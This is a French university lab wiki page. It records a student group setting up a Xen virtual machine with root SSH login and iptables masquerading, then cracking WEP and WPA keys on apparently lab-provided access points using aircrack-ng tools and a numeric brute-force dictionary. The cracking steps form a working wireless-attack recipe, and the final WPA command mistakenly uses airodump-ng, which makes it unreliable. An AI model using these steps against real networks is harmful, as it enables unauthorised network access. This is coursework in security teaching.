TP sysres IMA5sc 2019/2020 G3 : Différence entre versions
(→Machine virtuelle) |
(→Machine virtuelle) |
||
Ligne 41 : | Ligne 41 : | ||
gateway 193.48.57.190 | gateway 193.48.57.190 | ||
− | Puis on peut activer la connexion en ssh à notre VM | + | Puis on peut activer la connexion en ssh à notre VM sur le fichier suiviant en décommentant la ligne '''PermitRootLogin yes''' |
nano /etc/ssh/sshd_config | nano /etc/ssh/sshd_config | ||
Version du 9 décembre 2019 à 15:09
Mise en place
Suite au choix du thème, nous avons choisi comme nom de domaine herpesgenital
Machine virtuelle
La machine virtuelle sera sur installée sur Cordouan. On s'y connecte donc en ssh :
$ ssh root@cordouan.insecserv.deule.net
On peut ensuite créer la machine virtuelle Xen : (On n'oublie pas de fixer les paramètres de proxy)
$ export http_proxy=http://proxy.plil.fr:3128 $ export https_proxy=http://proxy.plil.fr:3128 $ xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force
On peut alors observer le mot de passe root dans le fichier suivant :
$ tail /var/log/xen-tools/herpesgenital.log
On va ensuite modifier le fichier de configuration de la machine virtuelle (/etc/xen/herpesgenital.cfg). On modifie la ligne suivante pour ajouter le bridge :
vif = [ 'mac=00:16:3E:2B:55:6A,bridge=IMA5sc' ]
On peut vérifier la configuration des bridges via la commande :
$ brctl show
On peut alors ensuite finaliser la création de la machine virtuelle puis interragir avec elle via le terminal :
$ xl create /etc/xen/herpesgenital.cfg $ xl console herpesgenital
Il est possible de se connecter en root avec le mot de passe récupéré précédemment puis modifier ce mot de passe via la commande
$ passwd root
VOIR LE PARTIONNEMENT
On ajoute l'adresse IP de notre VM en modifiant le fichier /etc/network/interfaces :
auto eth0 iface eth0 inet static address 193.48.57.179 netmask 255.255.255.240 gateway 193.48.57.190
Puis on peut activer la connexion en ssh à notre VM sur le fichier suiviant en décommentant la ligne PermitRootLogin yes
nano /etc/ssh/sshd_config
autoriser routage :
$ echo 1 > /proc/sys/net/ipv4/conf/all/forwarding
masquerade provisoire sur herpesgenital :
$ iptables -P FORWARD DROP $ iptables -A FORWARD -j ACCEPT -s 172.26.16.0/20 $ iptables -A FORWARD -j ACCEPT -d 172.26.16.0/20 $ iptables -t nat -A POSTROUTING -j MASQUERADE -s 172.26.16.0/20
On peut alors ping google.fr depuis private-herpesgenital pour vérifier que la masquarade provisoire est opérationnelle.
Pour rendre la masquarade persistante, on installe le paquet iptables-persistent sur herpesgenital.
Cassage de clé WEP
On utilise pour casser la clé WEP un dongle wifi "Wi-Pi". Après avoir connecté le dongle on affiche la liste des interfaces wifi via la commande
$ iwconfig
On observe alors le nom de de l'interface associée au dongle : wlx40a5ef0590b2 renommée lors de la commande en wlan0mon
On commence par passer l'interface en mode moniteur :
$ airmon-ng start wlan0mon
On peut alors visualiser les point d'accès WEP disponibles :
$ airodump-ng --encrypt wep wlan0mon
On choisit de travailler avec cracotte04 dont on va essayer de casser la clé WEP. Grâce à la commande précédente on a pu récupérer son BSSID et son Channel. On capture les paquets sur l'interface de craquotte04 via la commande :
$ airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:53 -w ./path_to_folder/cracotte04 wlan0mon
On lance alors en simultané sur un autre terminal des simulations de connexions au point d'accès. La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:53 wlan0mon
Une fois avoir capturé un grand nombre de paquets (au moins 20 000), on peut alors lancer le cassage :
$ aircrack-ng ./path_to_folder/cracotte04.cap
Cassage de clé WPA
De la même manière que pour le cassage de clé WEP, on utilise un dongle wifi en mode moniteur grace auquel on observe les caractéristiques (bssid et channel) du réseau sans fil dont on souhaite casser le code puis on capture au moins un handshake.
$ iwconfig $ airmon-ng start wlan0mon $ airodump-ng wlan0mon
Pour réaliser le cassage en WPA on doit fournir un dictionnaire de tous les mots de passe à essayer. On crée pour cela un simple code C
#include <stdio.h> int main(){ int i=0; for(i=0;i<100000000;i++){ printf("%d\n",i); } return 0; }
On éxécute ce code : (Ne pas oublier les permissions avec chmod si nécessaire)
$ ./executable > ./path_to/dictionnaire.txt
Puis on peut alors casser le code via la commande :
$ airodump-ng -w ./path_to/dictionnaire.txt ./path_to/kracotte07.cap